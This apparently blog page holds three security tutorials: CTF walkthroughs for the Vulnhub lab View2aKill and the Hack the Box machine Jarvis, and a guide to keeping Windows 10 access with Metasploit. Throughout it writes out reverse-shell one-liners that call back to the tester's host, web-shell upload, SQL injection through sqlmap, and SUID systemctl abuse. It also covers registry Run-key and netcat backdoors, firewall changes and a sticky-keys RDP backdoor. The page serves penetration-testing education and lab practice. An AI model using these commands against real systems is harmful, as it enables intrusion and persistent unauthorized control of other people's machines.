View2aKill: Vulnhub Walkthrough

Today we’ll be sharing another CTF challenge walkthrough. This lab is highly inspired by the James Bond movie- “A View to a Kill.” The lab is made by creosote and hosted on Vulnhub.

You can download the lab here

According to the Author:

Mission: Millionaire psychopath Max Zorin is a mastermind behind a scheme to destroy Silicon Valley in order to gain control over the international microchip market. Get root and stop this madman from achieving his goal!

·       Difficulty: Intermediate

·       Flag is /root/flag/flag.sh

·       Use in VMware. DHCP enabled.

·       Learning Objectives: Web Application Security, Scripting, Linux enumeration and more.

Penetration Testing Methodologies

Network Scanning

·       netdiscover

·       nmap scan

·       finding ports

Enumeration

·       Enumerating directories

·       Finding backup archive

·       Enumerating username and finding password

·       Finding /sentrifugo

Exploitation

·       Exploiting file upload vulnerability in sentrifugo

·       Gaining shell

·       Enumerating users and their home directories

·       Logging in Jenny

Post Exploitation

·       Finding aView.py script with Jenny’s group permissions

·       Reading note.txt using this script

·       Discovering algorithm for secret directories and finding directories by creating a custom script

·       Finding remote

·       Gaining root shell

Lets begin then

On netdiscover scan, we found the IP address of the machine to be 192.168.238.161

On running an nmap scan, we found 4 ports to be open. There was a webpage as well and nmap had also enumerated 4 disallowed entries in robots.txt

We opened these 4 directories one by one and saw HR acquisition portal on

On /dev there was an index listing of multiple files. There were PDFs on some kind of RFID device, text file, images and most importantly we saw a backup archive. We downloaded it.

Inside that archive were 4 text files among which, one important text file caught our eye which had info about a new employee chuck.

Now, in /dev directory the PDFs were starting to make sense! The password=secret word in a video+transmid freq of HID reader

In one of the PDFs we saw a manual on HID proxcard reader and found the frequency to be 125Hz

I didn’t see any video in /dev but there was a gif file which had a detonator in it. It said the word helicopter

So, the valid credentials were: chuck@localhost.com and pass: helicopter125

We tried to log it in the HR portal on /zorin

It said that /sentrifugo was where temporarily HR portal had moved. We moved there to find a login screen

It successfully logged us in with the found credentials! Now it was certain that exploitation had to begin from here. We tried to find any kind of vulnerability in sentrifugo platform and luckily we found one on exploit-db

We went on to the portal>expenses>add>receipts and added our php-reverse-shell with double extension methodology

It’s the webshell available in /usr/share/webshells. Just change the code to your own IP and make it double extension to .php.doc

Now we intercepted the upload using burpsuite and passed it on as php and it successfully accepted it!

We changed the extension from .php.doc to simply php and changed our IP from burpsuite only.

Once our shell was uploaded we started a reverse netcat listener on port 1234 and accepted the connection! We got our connection simply by viewing the shell that got uploaded.

First things first, we imported a pseudo teletype using python one liner.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Next, we traversed to the home directory and found there were 4 user directories there. In /home/jenny there was an archive named dsktp_backup.zip which seemed interesting so we unzipped it and found two text files. One had jenny’s password in it and other had some instructions among which there was a mention of a script called aView.py

We logged into jenny with password !!!sfbay!!! and traversed to /home/max to find that python script. Viewed the source code and found that it was simply printing out some text.

But the interesting thing to note was that it was running commands as max. And there was a note.txt in the same directory which jenny couldn’t read. So we added some code into the preexisting python script that would simply stdout the note.txt file in hope that it will be useful for privilege escalation. I wrote a script av.py that had the same content as existing script plus a command to print out note.txt

#!/usr/bin/python

import os

#

# executed from php app add final wrapper/script here

print “waiting on engineers to tweak final code”

os.system(‘cat note.txt’)

On the victim’s /tmp directory I downloaded this script using wget command. Then I traversed back in /home/max to simply stdout av.py and redirect it’s output in aView.py so that when jenny runs it, it also displays note.txt

Now, in note, scarpine wrote that a secret directory exists which is hashed using the algorithm:

sha1(lower_alpha+”view”+digit+digit)

This directory existed on port 8191 and had to be found out. I used a tool called mp64 to create this list using given algorithm in clear text and then coded a python script to covert this list into it’s respective SHA1 hashes.

mp64 ?lview?d?d > fuzz.txt

python fuzzing.py > new_fuzz.txt

We can then use a simple python/c script to convert the strings into sha1 hashes or use one of the online tools such as http://www.sha1-online.com/

This could also be done by this following code which isn’t that complicated.

new.py

#!/usr/bin/python

# -*- coding: UTF-8 -*-

import string

from hashlib import sha1

import requests

fuzz=[]

for alpha in string.ascii_lowercase:

               for a in string.digits:

                              for b in string.digits:

                                             payload= sha1((alpha + "view" + a + b + "\n").encode("utf-8")).hexdigest()

                                             fuzz.append(payload)

file1 = open("directories.txt","w")

for i in fuzz:

               file1.write(i)

               file1.write("\n")

file1.close()

By using the second method, we saved the hashes in directories.txt file and ran dirb scan using this list

Wow. A bunch of files were found. We tried to open first directory and looks like the author got us here!

But wait, there was a directory which had unusual length as compared to other directories. Maybe this had something

Looks like we found the remote! We executed this using the button and a script called run.php seemed to run.

Hey! This text seems familiar. You remember aView.py file? It seems like this run.php file was taking the stdout from aView.php file and displaying it. Now when I remember, the comment in aView.py also said “executed from php app…”

So we decided to replace some of the code in aView.py by pentestmonkey’s python one liner reverse shell!

We SSHed in jenny first and used nano to display contents of aView.py

We replaced aView.py with this code:

#!/usr/bin/python

import os

import socket

import subprocess

#
# executed from php app add final wrapper/script here

print “waiting on engineers to tweak final code”

os.system(‘cat note.txt’)

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call([“/bin/sh”,”-I”])

We set up a reverse listener on port 1234 and waited for shell and voila! Seems like run.php had root permissions since we got a root shell! We traversed to /root to read the flag

Lets open :8007 on our browser and read congratulatory flag!

So, this was how we solved this lab. In my opinion, if you know some things like a bit of python scripting and knowledge of basic linux permissions and tools, lab won’t feel lhard. It was certainly lengthy though due to the requirement of scripting but I thoroughly enjoyed the lab. Thanks to creosote for this!

Hack the Box- Jarvis Walkthrough

This article is walkthrough for the retired machine “Jarvis” on Hack the Box. This machine has a static IP address of 10.10.10.143. Hack the Box is a website to test your hands on penetration testing on intentionally vulnerable machines.

Level: Easy

Task: find user.txt and root.txt in victim’s machine.

Penetration Methodology

Scanning

·         Open ports and running services

Enumeration

·         Directories enumeration

Exploitation

·         Fuzzing to find SQLi

·         Exploiting SQLi using SQLmap

·         Spawning os-shell in SQLmap

·         Getting a meterpreter shell

Post Exploitation

·         Enumerating sudoers file

·         Running simpler.py script as user pepper

·         Gaining access to user pepper

·         Post exploitation using SUID set on systemctl

·         Gaining root access

Snagging the root flag

Let’s begin

We used the nmap aggressive scan on our target IP 10.10.10.143  and observed that ports 22 and 80 were open.

On moving to the website, we saw a website of some hotel running. The interface was very simple and nothing much could be obtained just by having a look at the source code or even running directory enumeration.

We then tried jumping tabs and testing OWASP Top 10, and luckily, we found SQL injection on the rooms page.

Vulnerable parameter was cod. It was obvious then to run sqlmap on this tamperable URL and see what databases were there on the website.

sqlmap –u http://10.10.10.143/room.php?cod=1 --dbs --batch

We see 4 databases running on the web application server out of which only one database, i.e, hotels seemed interesting.

We couldn’t find much here and there in databases so it made us go another way. There is this option in sqlmap called the “os-shell” that tries and spawns a shell of the web server.

sqlmap –u http://10.10.1.0.143/room.php?cod=1 --dbs --os-shell --batch

And as expected we landed up with a shell of the server. We confirmed the shell using the command id.

Now we tried to browse to user.txt but current user didn’t had the permission to read user.txt.

So, we tried to get access to another user but first we got out of this really slow and weird os-shell interface using a web_delivery payload and getting a session on meterpreter back.

We copied this python command onto the os-shell teletype and got a familiar teletype with us.

While running, we had a need to change the language from python to python3.

Once, we got our meterpreter session, we immediately got into shell mode using shell command. Then spawned a pseudo teletype using python one liner and finally checked sudoers file to find out a script called simpler.py that had permissions to run as root.

shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

sudo -u pepper /var/www/Admin-Utilities/simpler.py

On running the script, we see that it was simply pinging the IP. On further review of the source code, we found out that a simple OS injection wouldn’t have sufficed because all the characters are blacklisted

But we see that $ is not restricted. So, running this script as pepper and running our bash binary inside might give us shell of the user pepper.

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p $(/bin/bash)

ls

ls -al

id

We tried to run basic commands such as ls, id etc but none of them gave us any output. So, we try to get another shell over netcat using a bash payload

bash -i >& /dev/tcp/10.10.14.9/1234 0>&1

Here, 10.10.14.9 is my IP.

Let’s open a netcat listener on another terminal window. This time, the shell was better and we are able to read the user.txt flag.

Let’s move towards rooting the box.

First thing that we tried was to find binaries with SUID bit set.

netcat -lvp 1234

cat user.txt

find / -perm -u=s -type f 2>/dev/null

We found systemctl had an SUID bit set. It is fairly evident that if we create a .service file, systemctl would run it as root. Lets create a service file with name raj.service and add a bash binary in it to be run as root so we get a root bash shell.

Here is the code of the service file:

[Unit]

Description=hacking articles

[Service]

Type=simple

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.9/8888 0>&1'

[Install]

WantedBy=multi-user.target

In this service file, ExecStart command was going to give us a root shell on a netcat reverse listener set up at port 1234. We set up netcat listener and downloaded and this raj.service file in the victim’s system.

wget http://10.10.14.9:8000/raj.service

/bin/systemctl enable /home/pepper/raj.service

/bin/systemctl start raj

On our listener we were successfully able to get a reverse shell and voila! We got root.

nc -lvp 8888

cd /root

cat root.txt

We snagged the flag and that’s how we got root access to the system. It was a well balanced lab and there was a lot of new learning. There were no unnecessary exploit development and hence, we’d rate this as intermediate.

Multiple Ways to Persistence on Windows 10 with Metasploit

In this article you will learn the multiple ways to maintain access or create a persistent backdoor with the help of Metasploit Framework on the host machine which you have compromised.

Table of Content

Persistence Backdoor

Pre-requisites

Methods for Generating persistence using Metasploit

·         Persistence_service.

·         Mitigation method for persistence_service exploit.

·         Persistence_exe.

·         Mitigation method for persistence_exe exploit.

·         Registry_persistence.

·         Mitigation method for Registry_persistence exploit.

·         Persistence through Netcat.

·         Persistence through Remote Desktop Protocol.

 Conclusion

Persistence Backdoor

The word Persistence is simply known as permanent hence in this post, we are sharing the multiple methods to generate a permanent backdoor within the victim machine.

As there is a lot of hard work required to exploit any system and once the system is exploited successfully you need more time for further examine or penetrate the victim’s system but at that time if victim shut down his system or changed the credentials then all your hard work will be spoiled. That’s why maintaining access is an important phase of penetration testing. Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials and other interruptions that could cut off their access.

Pre-requisites

Window 10 -Victim System

Kali Linux – Attacker (Metasploit Framework)

Note: For creating a persistence backdoor, you should have a compromise machine of the victim with meterpreter session to continue all practices that are taught in this post.

Methods for Generating persistence using Metasploit

Let’s start, we already have compromised the window 10 (victim’s PC) and have meterpreter session along with the admin rights. To know how to get admin access click here. Now, we want to leave a permanent backdoor in victim system that will provide a reverse connection for the next time.

Persistence_Service

This Module will generate and upload an executable to a remote host, next will make it a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.

Thus, we will run the following commands on Kali Linux to run the above-listed module:

use exploit/windows/local.persistence_service

set session 2

set lport 5678

exploit

Above said module which will generate and upload an executable on the victim’s system under the /temp directory as  “lVFC.exe” and will make it a persistence service.

If the victim reboots the system, the previous meterpreter session will be closed. Only we need to set up the multi handler to run the payload by using the following commands:

use/exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.115

set lport 5678

exploit

Once the victim system starts, automatically we will gain the meterpreter session again.

When the PC is started automatically some of its services starts by default so persistence_service exploit creates a new service that will start the payload whenever the service is running. In the below image you can see the executable file IVFC.exe is running under username System and we can verify its path.

C:/Windows/Temp/IVFC.exe

Mitigation method for persistence_service exploit

First of all, identify the unfamiliar files which are running and then stop the running executable format file i.e. IVFC.exe and delete it from the temp directory.

Persistence_exe

This is the second method to maintain access to the victim’s PC. Under this scenario, we already have meterpreter session of the victim’s PC and it has user access.

This module will upload an executable to the victim’s system and make it persistent. It can be installed as a user, system or service. We will use this module by using the session 1(already compromised system’session) and set the rexpath (remote executable path), through this payload file will create on victim’s PC but due to persistence script, it will save under temp directory with default.exe name(change the name under rexname option ) and will set it to autorun under the registry path mentioned in below image.

 To run this module, type the following commands:

use post/windows/manage/persistence_exe

set session 1

set rexpath /root/payload.exe

exploit

After, successful execution of the above module, now we have to set up the multi handle by using the following command:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.115

set lport 1234

exploit

Once the victim reboots its PC and the login into it, automatically we will get the meterpreter session

.

In the below image you can see the function of persistence_exe, which will create the autorun service under the registry editor path: HKCU/software/microsoft/windows/currentversion/run/FOCxoPAO due to which service will start running as soon as the victim’s PC starts.

Its default file creates under the temp directory.

Mitigation Method for Persistence_exe

First remove the service from the registry editor under the path:

HKCU/software/microsoft/windows/currentversion/run/FOCxoPAO

And then delete the executable payload file under the temp directory and reboot the system.

Registry_persistence

A registry is the core part of the window and contains a surplus of raw data. Attackers love to choose windows registry locations to hook their codes so that files or codes cannot be detected by scans for suspicious activities.

This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in "CurrentVersion\Run" (depending on privilege and selected method). The payload will be installed completely in registry.

Since we already have compromised the victim’s Pc and have the meterpreter session along with the user privileges. Use the following command to execute the registry persistence.

use exploit/windows/local/registry_persistence 

set session 1

set lport 7654

exploit

Once the exploit executed, it will create a registry key under HKCU\software\wl4cN9w and installed key as highlighted in the image.

If the victim reboots the system, meterpreter session will dead get the session again just set up the multi handler payload and execute it.

use exploit/multi/handler

set set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.115

set lport 7654

exploit

Once the victim’s machine will start and as the victim will log in into the system, automatically we will get the meterpreter session again due to the autorun script under the registry which is installed by the attacker. Successfully registry _persistence is executed.

Through the below image you can verify the path of registry key created by registry_persistence exploit.

Persistence through Netcat

Netcat or nc is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attack and security. In the case of attack, it can be driven by scripts which makes it quite dependable back-end and if we talk about security, it helps us to debug the network along with investing it. To read more about netcat please refer https://www.hackingarticles.in/comprehensive-guide-on-netcat/.

Now we are going to make a persistence Netcat backdoor on the compromised system. As we already have meterpreter session, upload netcat.exe into system32 file of victim’s pc by using the following command:

upload/usr/share/windows-binaries/nc.exe C:\\windows\\system32

The next step is to set the netcat to listen on the random port i.e.4445, open the port on startup and make the connection.

Use the following command:

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'

On successful netcat connection we get the shell of the victim’s PC.

We will add the new rule in the firewall named as ‘netcat’ in which inbound connection will allow for port 4445 by using the interactive cmd prompt running a command called netsh. Type the following command:

 netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445

To check the operational mode and port status run the command:

netsh firewall show portopening

When the victim reboots the system again, we will get the netcat shell. On Kali Linux(attacker system) run the following command to connect our netcat backdoor via port 4445.

nc -nv 192.168.0.142 4445

Persistence through Remote Desktop Protocol

After having the meterpreter session of the already compromised targeted system. We will utilize Carlos Perez’s getgui script which enables Remote Desktop and creates a user account to login to it.

Username: Nisha

Password: 123

Run the following command:

run getgui -e u nisha -p 123

With help of the following module, it is possible to apply the 'sticky keys' hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog.

use post/windows/manage/sticky_keys

set session 2

exploit

As you can see here that we sticky is added successfully, now to launch the exploit at an RDP or UAC by press shift key 5 times.

Now we will check the connection using rdesktop and review the certificate and type Yes. By using the following command

rdesktop 192.168.0.142

Congrats !!! finally we get the Gui mode of the victim’s system.

Conclusion

Persistence does not required any authentication to connect with the victim’s system.To complete the penetration testing,always remember to cleanup the processess and the backdoor services on the victim’s host.